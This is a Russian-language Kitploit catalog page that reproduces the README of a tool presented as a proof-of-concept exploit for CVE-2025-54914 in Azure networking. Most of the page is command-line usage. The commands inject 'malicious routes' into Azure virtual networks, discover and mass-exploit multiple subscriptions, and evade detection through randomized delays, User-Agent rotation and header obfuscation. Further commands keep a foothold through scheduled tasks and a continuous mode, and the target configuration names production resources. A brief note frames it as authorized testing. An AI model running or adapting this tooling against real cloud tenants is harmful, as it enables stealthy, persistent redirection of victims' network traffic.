Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-54914-PoC — Эксплойт для CVE-2025-54914 в Azure Networking, создающий вредоносные маршруты с обходом защиты, устойчивостью, многоцелевым сканированием и отчетностью для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/ash1996x/cve-2025-54914-poc
РазведкаМеханизмы персистентностиАнализ уязвимостейЭксплуатацияОбход IDS/IPSТестирование на ПроникновениеБезопасность облачных сред
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

Эксплойт для CVE-2025-54914 в Azure Networking, создающий вредоносные маршруты с обходом защиты, устойчивостью, многоцелевым сканированием и отчетностью для авторизованного тестирования безопасности.

Репозиторий
44311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-54914 Эксплойт маршрутов Azure

Обзор

Это улучшенная реализация эксплойта для маршрутизации сети Azure по уязвимости CVE-2025-54914. Данная версия сохраняет основную функциональность CVE, добавляя такие возможности, как персистентность, обход обнаружения, сканирование нескольких целей и обработка ошибок.

Возможности

Базовая функциональность CVE

  • Создание маршрута: Создание вредоносных маршрутов в виртуальных сетях Azure
  • Удаление маршрута: Удаление созданных маршрутов для очистки
  • Совместимость с API: Работает с Azure Management API 2025-09-01
  • Аутентификация: Поддерживает Azure CLI и ручную аутентификацию по токену

Дополнительные возможности

  • Методы обхода: Случайные задержки, ротация User-Agent, обфускация запросов
  • Персистентность: Создание запланированных задач, режим непрерывного мониторинга
  • Многоцелевое сканирование: Одновременное сканирование и эксплуатация нескольких целей
  • Полноценное отчётность: Детальные отчёты с анализом успехов/неудач
  • Обработка ошибок: Корректная обработка сбоев и восстановление
  • Управление конфигурацией: Конфигурация целей на основе JSON
  • Обнаружение целей: Автоматическое обнаружение уязвимых ресурсов
  • Оценка рисков: Анализ уязвимостей и оценка рисков

Установка

Предварительные требования

# Установка зависимостей Python
pip install requests

# Установка Azure CLI (для аутентификации)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Настройка

# Назначение прав на выполнение скриптов
chmod +x exploit.py
chmod +x exploit_utils.py

# Аутентификация в Azure
az login

Использование

Базовое использование

Эксплуатация одной цели

# Создание маршрута на одной цели
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Удаление маршрута
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

Эксплуатация нескольких целей

# Создание файла конфигурации
python exploit_utils.py discover --output targets.json

# Эксплуатация всех целей
python exploit.py --targets-file targets.json --operation create

Режим сканирования

# Сканирование целей без эксплуатации
python exploit.py --targets-file targets.json --scan-only

Режим персистентности

# Включение персистентности с интервалом 30 минут
python exploit.py --targets-file targets.json --persistence-mode --interval 30

Расширенное использование

Обход и скрытность

# Пользовательские диапазоны задержек для обхода
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

Режим холостого прогона

# Тестирование без фактической эксплуатации
python exploit.py --targets-file targets.json --dry-run

Детальное логирование

# Включение отладки
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

Конфигурация

Формат конфигурации целей

{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Конфигурация целей для CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

Переменные окружения

# Токен доступа Azure (альтернатива Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Уровень логирования
export LOG_LEVEL="INFO"

Вспомогательные скрипты

Обнаружение целей

# Обнаружение всех доступных целей
python exploit_utils.py discover --output discovered_targets.json

# Обнаружение конкретных подписок
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

Генерация конфигурации

# Создание конфигурации эксплойта из обнаруженных целей
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

Анализ уязвимостей

# Анализ целей для оценки рисков
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

Функции безопасности

Методы обхода

  • Время отправки запросов: Случайные задержки между запросами
  • Ротация User-Agent: Несколько пользовательских агентов браузеров
  • Обфускация заголовков: Реалистичные HTTP-заголовки
  • Проверка SSL: Корректная проверка сертификатов

Механизмы персистентности

  • Запланированные задачи: Создание задач в планировщике Windows
  • Непрерывный режим: Долговременная персистентность
  • Управление сессиями: Сохранение состояния между запусками
  • Персистентность конфигурации: Сохранение настроек на диск

Обработка ошибок

  • Корректная деградация: Продолжение работы при отдельных сбоях
  • Защита от тайм-аутов: Предотвращение зависания запросов
  • Обработка сигналов: Чистое завершение при прерывании
  • Очистка ресурсов: Автоматическая очистка при выходе

Отчётность

Отчёты об эксплуатации

  • Результаты операций: Успех/неудача для каждой цели
  • Временная информация: Временные метки выполнения
  • Детали ошибок: Подробные сообщения об ошибках
  • Итоговая статистика: Общие показатели успешности

Отчёты об обнаружении

  • Инвентаризация целей: Полный список обнаруженных ресурсов
  • Разбивка по подпискам: Цели, сгруппированные по подпискам
  • Детали ресурсов: Информация о VNet, подсети и местоположении

Анализ уязвимостей

  • Оценка рисков: Категоризация рисков: высокий/средний/низкий
  • Индикаторы production: Идентификация производственных сред
  • Анализ тегов: Оценка рисков на основе тегов ресурсов

Рекомендации

Операционная безопасность

  1. Используйте холостой прогон: Всегда сначала тестируйте с --dry-run
  2. Ограничьте область: Начинайте с непроизводственных сред
  3. Мониторьте логи: Просматривайте логи на предмет неожиданного поведения
  4. Очищайте: Удаляйте созданные маршруты после тестирования

Оптимизация производительности

  1. Лимиты воркеров: Настраивайте --max-workers в зависимости от мощности системы
  2. Настройка задержек: Балансируйте скрытность и скорость с помощью параметров задержки
  3. Пакетная обработка: Используйте файлы целей для масштабных операций
  4. Мониторинг ресурсов: Следите за системными ресурсами во время выполнения

Восстановление после ошибок

  1. Проверьте логи: Анализируйте сообщения об ошибках для диагностики
  2. Проверьте разрешения: Убедитесь в наличии необходимых прав Azure
  3. Проверьте сетевое подключение: Убедитесь в доступе к интернету
  4. Проверьте токен: Проверьте статус аутентификации Azure CLI

Устранение неполадок

Часто встречающиеся проблемы

Ошибки аутентификации

# Повторная аутентификация в Azure
az login

# Проверка текущего аккаунта
az account show

# Список доступных подписок
az account list

Ошибки разрешений

# Проверка необходимых разрешений
az role assignment list --assignee $(az account show --query user.name -o tsv)

Сетевые ошибки

# Проверка соединения
curl -I https://management.azure.com
Скачать инструмент